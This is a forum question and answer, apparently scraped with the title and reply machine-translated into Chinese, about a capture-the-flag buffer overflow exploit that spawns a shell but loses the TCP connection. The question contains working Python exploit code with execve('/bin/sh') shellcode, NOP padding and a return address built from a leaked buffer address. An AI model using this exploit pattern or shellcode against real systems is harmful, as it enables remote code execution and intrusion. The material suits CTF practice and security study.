缓冲区溢出漏洞利用 TCP 不会保持外壳打开

Question

I have crafted a buffer overflow exploit for a remote machine for this CTF. The challenge prints out an address, which you then have to use in order to know where your shellcode is being stored. Attached is my current exploit code:

if len(sys.argv) != 3:
    print "Usage: %s host port" % (sys.argv[0])
    sys.exit(0)

s = socket.create_connection([sys.argv[1], int(sys.argv[2])])
recieved = s.recv(4096)
print(recieved)
#send 10 bytes of data
s.send("9999\n")
time.sleep(.2)
raw_input("EXPLOIT ?? ")

print s.recv(4096)

sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" 
pad = "\x90" * 251
IP = struct.pack("I",literal_eval(recieved[13:23]))
print("ADDR: ", recieved[13:23])
s.send(sh + pad + IP)

Essentially first I am creating the connection, then I am sending an input that directs the program to where it needs to go in order for the exploit to be possible (not really relevant for this question)

Next I create the exploit itself

The basic premise is:

shellcode + padding + eip

The eip address comes from what is given to my by the output of the program (which is what I am parsing in the IP variable)

That address is the beginning of the buffer, which is where my shellcode starts, and thus where I want to jump to.

I am running the binary using socat so that it is identical to the challenge hosted on the CTF's servers. I attach to the process using GDB and then run my exploit. It succeeds but gives this output:

process 2422 is executing new program: /usr/bin/dash
[Inferior 1 (process 2422) exited normally]
(gdb) 

and my connection to the service is terminated.

If I was running this with a local binary, I would use (python file.py ; cat - ;) | ./program to keep the stream open, but that is not an option since I need what the program outputs and have to do it remotely. I have tried using Telnet as well, but then the program just hangs and nothing happens.

Answer 1

通过 tmux 运行漏洞利用脚本对我有用。